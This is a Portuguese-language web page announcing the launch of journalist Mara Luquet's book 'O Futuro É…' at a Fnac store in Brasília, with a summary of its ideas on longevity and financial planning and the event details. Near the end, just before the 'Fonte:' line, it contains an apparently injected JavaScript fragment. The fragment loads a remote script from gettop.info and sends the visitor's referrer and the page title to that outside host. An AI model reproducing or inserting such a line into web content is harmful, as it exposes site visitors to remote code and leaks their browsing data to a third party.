Jornalista Mara Luquet lança o livro “O Futuro é…”, dia 3, na Fnac

Trazendo um pouco da educação econômica para a mesa, a jornalista e escritora Mara Luquet lança o livro “O Futuro É…”, que vem para tirar as dúvidas populares sobre planejamento financeiro, aposentadoria, investimentos e muito mais.

O lançamento do livro acontece na quinta-feira, 3, às 19h30, na Livraria Fnac do ParkShopping, em Brasília. O evento contará com bate-papo com a autora mediado pelo jornalista Estevão Damásio da Rádio CBN Brasília.

mara-luquet-no-jornal-da-globo-divulgacao

Neste livro, Mara elabora com maestria três mensagens essenciais para quem quer bem usufruir da  revolução da longevidade –   Sem dúvida é melhor envelhecer com qualidade a morrer cedo.   É indispensável adotar uma perspectiva de curso de vida- quanto mais cedo nos prepararmos para bem envelhecer, melhor – porém, nunca é tarde demais.   

A longevidade que alcançamos demanda o acúmulo de quatro capitais- o da saúde (todos querem envelhecer com saúde, mas para isso é preciso investir nela); o financeiro (dinheiro não é tudo, mas, claro, facilita a vida); o de conhecimentos (adotando uma atitude de aprendizagem ao longo da vida) e o capital social (afinal, um dia, pode ser que precisemos de alguém que cuide de nós). Do acúmulo desses quatro capitais depende nossa resiliência – dispor de reservas para reagir positivamente aos desafios da vida, adaptando-se a eles e, no processo, deles tirando lições. 


Lançamento do livro “O Futuro É…” de Mara Luquet
Dia 03 de novembro, quinta-feira, às 19h30
Fnac Brasília – ParkShopping  
SAI/SO ÁREA 6580 LUC 149P – GUARÁ BRASILIA – DF 
Entrada Franca e Livre para todos os públicos
Informações: (61) 21052000
Evento sujeito a lotação

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Fonte:

Deixe um comentário